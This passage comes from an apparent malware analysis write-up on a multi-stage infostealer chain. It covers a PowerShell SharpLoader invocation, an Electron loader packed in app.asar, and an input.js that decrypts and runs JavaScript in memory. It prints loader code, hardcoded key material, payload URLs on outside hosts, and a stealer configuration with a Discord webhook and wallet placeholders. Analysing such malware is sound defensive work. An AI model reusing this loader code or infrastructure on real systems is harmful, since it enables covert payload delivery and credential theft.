parameters to the second-stage payload.",[806,8499,8500],{},"Internally, the arguments are collected and forwarded like this:",[1545,8502,8504],{"className":7708,"code":8503,"language":7710,"meta":863,"style":863},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[1524,8505,8506,8511],{"__ignoreMap":863},[1588,8507,8508],{"class":1590,"line":1591},[1588,8509,8510],{},"object[] cmd = 
args.Skip(2).ToArray();\n",[1588,8512,8513],{"class":1590,"line":864},[1588,8514,8515],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[806,8517,8518],{},"This means that the .NET payload is expected to have a signature like:",[1545,8520,8522],{"className":8078,"code":8521,"language":8080,"meta":863,"style":863},"static void Main(string[] args)\n",[1524,8523,8524],{"__ignoreMap":863},[1588,8525,8526],{"class":1590,"line":1591},[1588,8527,8521],{},[806,8529,8530,8531,8533],{},"or it will gracefully fall back to the parameterless ",[1524,8532,8490],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[806,8535,8536],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[810,8538,8540],{"id":8539},"_46-real-world-usage-example","4.6 Real-World Usage Example",[806,8542,1536],{},[806,8544,8545],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[1545,8547,8549],{"className":7708,"code":8548,"language":7710,"meta":863,"style":863},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[1524,8550,8551],{"__ignoreMap":863},[1588,8552,8553],{"class":1590,"line":1591},[1588,8554,8548],{},[806,8556,8557],{},"This example highlights the typical use case of SharpLoader:",[2738,8559,8560,8574,8586,8596],{},[2741,8561,8562,8565,8566,8569,8570,8573],{},[1736,8563,8564],{},"Location Argument",": The URL points to a remote server hosting ",[1524,8567,8568],{},"calc.enc",", a concealed second-stage payload. 
The endpoint is located under a legitimate-looking ",[1524,8571,8572],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[2741,8575,8576,2545,8579,8581,8582,8585],{},[1736,8577,8578],{},"Payload Characteristics",[1524,8580,8568],{}," is a ",[1736,8583,8584],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[2741,8587,8588,8591,8592,8595],{},[1736,8589,8590],{},"Password Argument",": The string ",[1524,8593,8594],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[2741,8597,8598,8601,8602,8604],{},[1736,8599,8600],{},"No Additional Arguments",": The ",[1524,8603,8496],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[806,8606,8607,8608,8611],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[1736,8609,8610],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[810,8613,8615],{"id":8614},"_47-summary","4.7 Summary",[806,8617,1536],{},[806,8619,8620,8621,8623],{},"The ",[1524,8622,7919],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[806,8625,8626],{},[1736,8627,8628],{},"Key Highlights:",[2738,8630,8631,8640,8646,8652],{},[2741,8632,8633,8636,8637,8639],{},[1736,8634,8635],{},"Bypassing AMSI",": Direct in-memory patching of ",[1524,8638,8059],{}," disables antivirus inspection without invoking detectable 
APIs.",[2741,8641,8642,8645],{},[1736,8643,8644],{},"Secure Payload Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[2741,8647,8648,8651],{},[1736,8649,8650],{},"Memory-Only Execution",": Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[2741,8653,8654,8657],{},[1736,8655,8656],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[1511,8659,8661,8662,8664],{"id":8660},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[1524,8663,6639],{}," – Electron-Based Malware Loader",[806,8666,816],{},[806,8668,8669,8670,8672,8673,8676,8677,8679,8680,8682],{},"During reverse engineering, it became clear that ",[1524,8671,6639],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[1736,8674,8675],{},"Electron-based malware loader",". It was delivered inside an archive named ",[1524,8678,7852],{},", which ",[1524,8681,6635],{}," downloaded and extracted at runtime. 
Once unpacked, the structure and contents strongly resembled a typical Electron application.",[810,8684,8686],{"id":8685},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[806,8688,1536],{},[806,8690,8691],{},"The extracted folder included files such as:",[2738,8693,8694,8705,8713,8719],{},[2741,8695,8696,2289,8699,2289,8702],{},[1524,8697,8698],{},"chrome_100_percent.pak",[1524,8700,8701],{},"v8_context_snapshot.bin",[1524,8703,8704],{},"d3dcompiler_47.dll",[2741,8706,8707,5611,8710],{},[1524,8708,8709],{},"LICENSES.chromium",[1524,8711,8712],{},"LICENSES.electron",[2741,8714,8715,8716,8718],{},"A large ",[1524,8717,6639],{}," binary (~150 MB)",[2741,8720,8721,8722,8724,8725,8727,8728],{},"A ",[1524,8723,7862],{}," folder containing ",[1524,8726,7089],{}," and a secondary binary ",[1524,8729,8730],{},"elevate.exe",[806,8732,8733],{},[1449,8734],{"alt":8735,"src":8736},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[806,8738,8739,8740,8742],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[1524,8741,8730],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[810,8744,8746],{"id":8745},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[806,8748,1536],{},[806,8750,8751,8752,8754,8755,8757,8758,8760,8761,8763,8764,8767],{},"Rather than executing ",[1524,8753,6639],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[1524,8756,6639],{}," was built with Electron was confirmed by locating the ",[1524,8759,7089],{}," file inside the ",[1524,8762,7862],{}," directory. 
In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[1524,8765,8766],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[806,8769,8620,8770,8773,8774,8777],{},[1524,8771,8772],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[1524,8775,8776],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[806,8779,8780,8781,8784],{},"To unpack it, I used the official ",[1524,8782,8783],{},"asar"," tool provided via npm. The steps were:",[1545,8786,8788],{"className":1747,"code":8787,"language":1749,"meta":863,"style":863},"npm install -g asar\nasar extract app.asar extracted_app\n",[1524,8789,8790,8804],{"__ignoreMap":863},[1588,8791,8792,8795,8798,8801],{"class":1590,"line":1591},[1588,8793,8794],{"class":1756},"npm",[1588,8796,8797],{"class":1774}," install",[1588,8799,8800],{"class":1760}," -g",[1588,8802,8803],{"class":1774}," asar\n",[1588,8805,8806,8808,8811,8814],{"class":1590,"line":864},[1588,8807,8783],{"class":1756},[1588,8809,8810],{"class":1774}," extract",[1588,8812,8813],{"class":1774}," app.asar",[1588,8815,8816],{"class":1774}," extracted_app\n",[806,8818,8819,8820,8823],{},"Running the above commands extracted the content into a working folder (",[1524,8821,8822],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[2738,8825,8826,8847,8855],{},[2741,8827,8828,2289,8831,2289,8834,8837,8838,8840,8841,8843,8844,8846],{},[1524,8829,8830],{},"jscryter.js",[1524,8832,8833],{},"input.js",[1524,8835,8836],{},"obf.js",": These scripts form the malware logic. 
",[1524,8839,8830],{}," appears to orchestrate payload delivery, ",[1524,8842,8833],{}," defines configuration constants or command logic, and ",[1524,8845,8836],{}," is a heavily obfuscated script likely containing the core payload logic.",[2741,8848,8849,2289,8851,8854],{},[1524,8850,8766],{},[1524,8852,8853],{},"package-lock.json",": Define the runtime environment",[2741,8856,8857,8860,8861,2289,8864,2289,8867],{},[1524,8858,8859],{},"node_modules/",": Contains all dependencies like ",[1524,8862,8863],{},"axios",[1524,8865,8866],{},"adm-zip",[1524,8868,8869],{},"child_process",[806,8871,8872,8873,8875,8876,2786],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[1524,8874,6639],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[1524,8877,7089],{},[810,8879,8881],{"id":8880},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[806,8883,1536],{},[806,8885,8886],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. 
The scripts were designed to:",[2738,8888,8889,8896,8901,8904],{},[2741,8890,8891,8892,8895],{},"Download an encrypted payload (",[1524,8893,8894],{},"pyth.zip",") from fallback URLs",[2741,8897,8898,8899],{},"Extract the archive using ",[1524,8900,8866],{},[2741,8902,8903],{},"Perform string replacement to inject specific credentials or wallet addresses",[2741,8905,8906,8907,8909,8910,5611,8913],{},"Launch the resulting Python file (",[1524,8908,6643],{},") via ",[1524,8911,8912],{},"child_process.exec()",[1524,8914,6615],{},[806,8916,8917,8918,8924],{},"Crucially, the loader also included logic to ",[1736,8919,8920,8921,8923],{},"copy ",[1524,8922,6635],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[1511,8926,8928,8929,8931],{"id":8927},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[1524,8930,8833],{}," – The Encrypted JavaScript Payload Loader",[806,8933,816],{},[806,8935,8936,8938],{},[1524,8937,8833],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[810,8940,8942],{"id":8941},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[806,8944,1536],{},[806,8946,8947,8948,8950],{},"At first glance, ",[1524,8949,8833],{}," contains very little readable code. 
However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[1671,8952,8954],{"id":8953},"_611-decryption-logic","6.1.1 Decryption Logic",[806,8956,1677],{},[806,8958,8959,8960,8963],{},"The script defines a ",[1524,8961,8962],{},"decrypt()"," function that accepts four parameters:",[2738,8965,8966,8972,8978,8984],{},[2741,8967,8968,8971],{},[1524,8969,8970],{},"encdata",": The encrypted Base64-encoded data",[2741,8973,8974,8977],{},[1524,8975,8976],{},"masterkey",": A plaintext passphrase",[2741,8979,8980,8983],{},[1524,8981,8982],{},"salt",": A cryptographic salt (Base64)",[2741,8985,8986,8989],{},[1524,8987,8988],{},"iv",": The initialization vector for AES decryption (Base64)",[806,8991,8992,8993,8996],{},"The decryption process is implemented using Node.js’s built-in ",[1524,8994,8995],{},"crypto"," module. It proceeds as follows:",[4351,8998,8999,9106,9218],{},[2741,9000,9001,9004,9005,9080],{},[1736,9002,9003],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[1545,9006,9010],{"className":9007,"code":9008,"language":9009,"meta":863,"style":863},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[1524,9011,9012,9032,9037,9054,9062,9069,9076],{"__ignoreMap":863},[1588,9013,9014,9017,9020,9023,9026,9029],{"class":1590,"line":1591},[1588,9015,9016],{"class":1770},"const",[1588,9018,9019],{"class":1760}," key",[1588,9021,9022],{"class":1770}," =",[1588,9024,9025],{"class":1778}," crypto.",[1588,9027,9028],{"class":1756},"pbkdf2Sync",[1588,9030,9031],{"class":1778},"(\n",[1588,9033,9034],{"class":1590,"line":864},[1588,9035,9036],{"class":1778},"  masterkey,\n",[1588,9038,9039,9042,9045,9048,9051],{"class":1590,"line":1814},[1588,9040,9041],{"class":1778},"  
Buffer.",[1588,9043,9044],{"class":1756},"from",[1588,9046,9047],{"class":1778},"(salt, ",[1588,9049,9050],{"class":1774},"\"base64\"",[1588,9052,9053],{"class":1778},"),\n",[1588,9055,9056,9059],{"class":1590,"line":1831},[1588,9057,9058],{"class":1760},"  100000",[1588,9060,9061],{"class":1778},",\n",[1588,9063,9064,9067],{"class":1590,"line":2135},[1588,9065,9066],{"class":1760},"  32",[1588,9068,9061],{"class":1778},[1588,9070,9071,9074],{"class":1590,"line":2141},[1588,9072,9073],{"class":1774},"  \"sha512\"",[1588,9075,9061],{"class":1778},[1588,9077,9078],{"class":1590,"line":2147},[1588,9079,2308],{"class":1778},[2738,9081,9082,9088,9094,9100],{},[2741,9083,9084,9087],{},[1736,9085,9086],{},"Hash function:"," SHA-512",[2741,9089,9090,9093],{},[1736,9091,9092],{},"Iterations:"," 100,000",[2741,9095,9096,9099],{},[1736,9097,9098],{},"Key length:"," 32 bytes (256 bits)",[2741,9101,9102,9105],{},[1736,9103,9104],{},"Salt:"," Supplied as a Base64-decoded input",[2741,9107,9108,9111,9112,9162,9164,9165],{},[1736,9109,9110],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[1545,9113,9115],{"className":9007,"code":9114,"language":9009,"meta":863,"style":863},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[1524,9116,9117,9133,9140,9145,9158],{"__ignoreMap":863},[1588,9118,9119,9121,9124,9126,9128,9131],{"class":1590,"line":1591},[1588,9120,9016],{"class":1770},[1588,9122,9123],{"class":1760}," decipher",[1588,9125,9022],{"class":1770},[1588,9127,9025],{"class":1778},[1588,9129,9130],{"class":1756},"createDecipheriv",[1588,9132,9031],{"class":1778},[1588,9134,9135,9138],{"class":1590,"line":864},[1588,9136,9137],{"class":1774},"  \"aes-256-cbc\"",[1588,9139,9061],{"class":1778},[1588,9141,9142],{"class":1590,"line":1814},[1588,9143,9144],{"class":1778},"  
key,\n",[1588,9146,9147,9149,9151,9154,9156],{"class":1590,"line":1831},[1588,9148,9041],{"class":1778},[1588,9150,9044],{"class":1756},[1588,9152,9153],{"class":1778},"(iv, ",[1588,9155,9050],{"class":1774},[1588,9157,9053],{"class":1778},[1588,9159,9160],{"class":1590,"line":2135},[1588,9161,2308],{"class":1778},[2016,9163],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[1545,9166,9168],{"className":9007,"code":9167,"language":9009,"meta":863,"style":863},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[1524,9169,9170,9199],{"__ignoreMap":863},[1588,9171,9172,9175,9178,9181,9184,9187,9190,9192,9194,9197],{"class":1590,"line":1591},[1588,9173,9174],{"class":1770},"let",[1588,9176,9177],{"class":1778}," decrypted ",[1588,9179,9180],{"class":1770},"=",[1588,9182,9183],{"class":1778}," decipher.",[1588,9185,9186],{"class":1756},"update",[1588,9188,9189],{"class":1778},"(encdata, ",[1588,9191,9050],{"class":1774},[1588,9193,2289],{"class":1778},[1588,9195,9196],{"class":1774},"\"utf8\"",[1588,9198,2308],{"class":1778},[1588,9200,9201,9204,9207,9209,9212,9214,9216],{"class":1590,"line":864},[1588,9202,9203],{"class":1778},"decrypted ",[1588,9205,9206],{"class":1770},"+=",[1588,9208,9183],{"class":1778},[1588,9210,9211],{"class":1756},"final",[1588,9213,2030],{"class":1778},[1588,9215,9196],{"class":1774},[1588,9217,2308],{"class":1778},[2741,9219,9220,9223,9224,9227,9228,9249,9251],{},[1736,9221,9222],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. 
Instead, it is dynamically executed in memory using the ",[1524,9225,9226],{},"Function"," constructor:",[1545,9229,9231],{"className":9007,"code":9230,"language":9009,"meta":863,"style":863},"new Function(\"require\", decrypted)(require);\n",[1524,9232,9233],{"__ignoreMap":863},[1588,9234,9235,9238,9241,9243,9246],{"class":1590,"line":1591},[1588,9236,9237],{"class":1770},"new",[1588,9239,9240],{"class":1756}," Function",[1588,9242,2030],{"class":1778},[1588,9244,9245],{"class":1774},"\"require\"",[1588,9247,9248],{"class":1778},", decrypted)(require);\n",[2016,9250],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[806,9253,9254],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[806,9256,9257],{},[1736,9258,9259],{},"Key Material and Encrypted Data",[806,9261,9262],{},"The script includes the following hardcoded inputs:",[2738,9264,9265,9271,9279,9287],{},[2741,9266,9267,9270],{},[1736,9268,9269],{},"Encrypted Data:"," A massive Base64-encoded blob",[2741,9272,9273,2025,9276],{},[1736,9274,9275],{},"Master Key:",[1524,9277,9278],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[2741,9280,9281,2025,9283,9286],{},[1736,9282,9104],{},[1524,9284,9285],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[2741,9288,9289,2025,9292,9286],{},[1736,9290,9291],{},"IV:",[1524,9293,9294],{},"HwK6sOz7FBbL+YsrOxtYUg==",[806,9296,9297,9298,2786],{},"These are all embedded directly in the source code of ",[1524,9299,8833],{},[810,9301,9303],{"id":9302},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[806,9305,1536],{},[806,9307,9308],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[1671,9310,9312],{"id":9311},"_621-environment-preparation","6.2.1 Environment 
Preparation",[806,9314,1677],{},[806,9316,9317],{},"The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[2738,9319,9320,9353],{},[2741,9321,9322,9325,9326,9329,9330],{},[1736,9323,9324],{},"Temporary Directory Resolution:","\nThe malware calls ",[1524,9327,9328],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[1545,9331,9333],{"className":9007,"code":9332,"language":9009,"meta":863,"style":863},"const tempDir = os.tmpdir();\n",[1524,9334,9335],{"__ignoreMap":863},[1588,9336,9337,9339,9342,9344,9347,9350],{"class":1590,"line":1591},[1588,9338,9016],{"class":1770},[1588,9340,9341],{"class":1760}," tempDir",[1588,9343,9022],{"class":1770},[1588,9345,9346],{"class":1778}," os.",[1588,9348,9349],{"class":1756},"tmpdir",[1588,9351,9352],{"class":1778},"();\n",[2741,9354,9355,9358,9359,9372],{},[1736,9356,9357],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[2738,9360,9361,9366],{},[2741,9362,9363,9365],{},[1524,9364,8894],{},": The archive that contains the actual second-stage Python-based stealer",[2741,9367,9368,9371],{},[1524,9369,9370],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[1545,9373,9375],{"className":9007,"code":9374,"language":9009,"meta":863,"style":863},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[1524,9376,9377,9400],{"__ignoreMap":863},[1588,9378,9379,9381,9384,9386,9389,9392,9395,9398],{"class":1590,"line":1591},[1588,9380,9016],{"class":1770},[1588,9382,9383],{"class":1760}," 
tempFile",[1588,9385,9022],{"class":1770},[1588,9387,9388],{"class":1778}," path.",[1588,9390,9391],{"class":1756},"join",[1588,9393,9394],{"class":1778},"(tempDir, ",[1588,9396,9397],{"class":1774},"\"pyth.zip\"",[1588,9399,2308],{"class":1778},[1588,9401,9402,9404,9407,9409,9411,9413,9415,9418],{"class":1590,"line":864},[1588,9403,9016],{"class":1770},[1588,9405,9406],{"class":1760}," binderFile",[1588,9408,9022],{"class":1770},[1588,9410,9388],{"class":1778},[1588,9412,9391],{"class":1756},[1588,9414,9394],{"class":1778},[1588,9416,9417],{"class":1774},"\"bnd.exe\"",[1588,9419,2308],{"class":1778},[806,9421,9422],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[1671,9424,9426],{"id":9425},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[806,9428,1677],{},[806,9430,9431],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[2738,9433,9434,9465,9550,9584],{},[2741,9435,9436,9439,9440,9459,9461,9462,9464],{},[1736,9437,9438],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. 
It sends a GET request to:",[1545,9441,9443],{"className":9007,"code":9442,"language":9009,"meta":863,"style":863},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[1524,9444,9445],{"__ignoreMap":863},[1588,9446,9447,9449,9452,9454,9457],{"class":1590,"line":1591},[1588,9448,9016],{"class":1770},[1588,9450,9451],{"class":1760}," url",[1588,9453,9022],{"class":1770},[1588,9455,9456],{"class":1774}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[1588,9458,2849],{"class":1778},[2016,9460],{},"This returns a plain-text URL string pointing to the actual location of the ",[1524,9463,8894],{}," archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[2741,9466,9467,9470,9471,9503,9505,9506,9508,9509,9543,9545,9546,9549],{},[1736,9468,9469],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[1545,9472,9474],{"className":9007,"code":9473,"language":9009,"meta":863,"style":863},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[1524,9475,9476],{"__ignoreMap":863},[1588,9477,9478,9480,9483,9485,9488,9491,9494,9497,9500],{"class":1590,"line":1591},[1588,9479,9016],{"class":1770},[1588,9481,9482],{"class":1760}," fileResponse",[1588,9484,9022],{"class":1770},[1588,9486,9487],{"class":1770}," await",[1588,9489,9490],{"class":1778}," axios.",[1588,9492,9493],{"class":1756},"get",[1588,9495,9496],{"class":1778},"(fileUrl, { responseType: ",[1588,9498,9499],{"class":1774},"\"stream\"",[1588,9501,9502],{"class":1778}," });\n",[2016,9504],{},"The file is written to disk as ",[1524,9507,8894],{}," in the system's temp directory:",[1545,9510,9512],{"className":9007,"code":9511,"language":9009,"meta":863,"style":863},"const writer = 
fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[1524,9513,9514,9532],{"__ignoreMap":863},[1588,9515,9516,9518,9521,9523,9526,9529],{"class":1590,"line":1591},[1588,9517,9016],{"class":1770},[1588,9519,9520],{"class":1760}," writer",[1588,9522,9022],{"class":1770},[1588,9524,9525],{"class":1778}," fs.",[1588,9527,9528],{"class":1756},"createWriteStream",[1588,9530,9531],{"class":1778},"(tempFile);\n",[1588,9533,9534,9537,9540],{"class":1590,"line":864},[1588,9535,9536],{"class":1778},"fileResponse.data.",[1588,9538,9539],{"class":1756},"pipe",[1588,9541,9542],{"class":1778},"(writer);\n",[2016,9544],{},"This download is wrapped in a ",[1524,9547,9548],{},"Promise"," that is awaited, so the archive is fully written to disk before further logic is executed; the transfer itself remains asynchronous, it is simply waited for rather than made synchronous.",[2741,9551,9552,9555,9556,9581,9583],{},[1736,9553,9554],{},"Fallback URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[1545,9557,9559],{"className":9007,"code":9558,"language":9009,"meta":863,"style":863},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[1524,9560,9561,9572],{"__ignoreMap":863},[1588,9562,9563,9566,9568],{"class":1590,"line":1591},[1588,9564,9565],{"class":1756},"https",[1588,9567,3034],{"class":1778},[1588,9569,9571],{"class":9570},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[1588,9573,9574,9576,9578],{"class":1590,"line":864},[1588,9575,9565],{"class":1756},[1588,9577,3034],{"class":1778},[1588,9579,9580],{"class":9570},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[2016,9582],{},"These URLs sit under the .well-known/pki-validation/ directory that several commercial CAs use for HTTP-based domain-control validation (Let's Encrypt's ACME protocol uses .well-known/acme-challenge/ instead), so the payload looks like routine certificate-validation content and attracts less suspicion; note that the second mirror's path is spelled /well-known/ without the leading dot. 
Each fallback is retried with the same streaming and file-write logic.",[2741,9585,9586,9589,9590,9593],{},[1736,9587,9588],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (",[1524,9591,9592],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[806,9595,9596],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[2738,9598,9599,9605],{},[2741,9600,9601,9602,9604],{},"Downloads ",[1524,9603,8894],{}," from the resolved URL",[2741,9606,9607,9608],{},"If that fails, it attempts fallback mirrors:\n",[2738,9609,9610,9615],{},[2741,9611,9612],{},[1524,9613,9614],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[2741,9616,9617],{},[1524,9618,9619],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[1671,9621,9623],{"id":9622},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[806,9625,1677],{},[806,9627,9628,9629,9631,9632,9634],{},"Once the ",[1524,9630,8894],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. 
This is accomplished using the ",[1524,9633,8866],{}," Node.js library, which allows programmatic handling of ZIP files.",[2738,9636,9637,9684,9711],{},[2741,9638,9639,9642,9678,9680,9681,9683],{},[1736,9640,9641],{},"ZIP Extraction:",[1545,9643,9645],{"className":9007,"code":9644,"language":9009,"meta":863,"style":863},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[1524,9646,9647,9664],{"__ignoreMap":863},[1588,9648,9649,9651,9654,9656,9659,9662],{"class":1590,"line":1591},[1588,9650,9016],{"class":1770},[1588,9652,9653],{"class":1760}," zip",[1588,9655,9022],{"class":1770},[1588,9657,9658],{"class":1770}," new",[1588,9660,9661],{"class":1756}," AdmZip",[1588,9663,9531],{"class":1778},[1588,9665,9666,9669,9672,9674,9676],{"class":1590,"line":864},[1588,9667,9668],{"class":1778},"zip.",[1588,9670,9671],{"class":1756},"extractAllTo",[1588,9673,9394],{"class":1778},[1588,9675,1435],{"class":1760},[1588,9677,2308],{"class":1778},[2016,9679],{},"This extracts all contents of the archive to the system's temporary directory. 
The ",[1524,9682,1435],{}," flag ensures overwriting of any existing files.",[2741,9685,9686,9689,9690,9692,9693],{},[1736,9687,9688],{},"Archive Contents:","\nThe archive ",[1524,9691,8894],{}," includes a fully bundled Python project, including:",[2738,9694,9695,9698,9701],{},[2741,9696,9697],{},"A directory structure resembling a legitimate Python package",[2741,9699,9700],{},"Several Python modules and dependencies",[2741,9702,9703,9704,9706,9707,9710],{},"The key file ",[1524,9705,6643],{}," located at ",[1524,9708,9709],{},"Crypto/Util/astor.py",", which is the main stealer payload",[2741,9712,9713,9716,9717,9719,9720,9740],{},[1736,9714,9715],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[1524,9718,6643],{}," to inject attacker-controlled configuration data such as:",[2738,9721,9722,9725,9728,9734],{},[2741,9723,9724],{},"A Discord webhook URL",[2741,9726,9727],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[2741,9729,9730,9731,2772],{},"A user identifier (",[1524,9732,9733],{},"%USERID%",[2741,9735,9736,9737,2772],{},"An error status flag (",[1524,9738,9739],{},"%ERRORSTATUS%",[1545,9741,9743],{"className":9007,"code":9742,"language":9009,"meta":863,"style":863},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? 
\"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[1524,9744,9745,9805,9818,9841,9851,9856,9861,9866,9871],{"__ignoreMap":863},[1588,9746,9747,9750,9753,9756,9758,9761,9764,9767,9770,9773,9776,9779,9781,9784,9787,9791,9793,9796,9799,9802],{"class":1590,"line":1591},[1588,9748,9749],{"class":1778},"fs.",[1588,9751,9752],{"class":1756},"readFile",[1588,9754,9755],{"class":1778},"(extractedDir ",[1588,9757,2778],{"class":1770},[1588,9759,9760],{"class":1774}," \"",[1588,9762,9763],{"class":1760},"\\C",[1588,9765,9766],{"class":1774},"rypto",[1588,9768,9769],{"class":1760},"\\U",[1588,9771,9772],{"class":1774},"til",[1588,9774,9775],{"class":1760},"\\a",[1588,9777,9778],{"class":1774},"stor.py\"",[1588,9780,2289],{"class":1778},[1588,9782,9783],{"class":1774},"'utf8'",[1588,9785,9786],{"class":1778},", 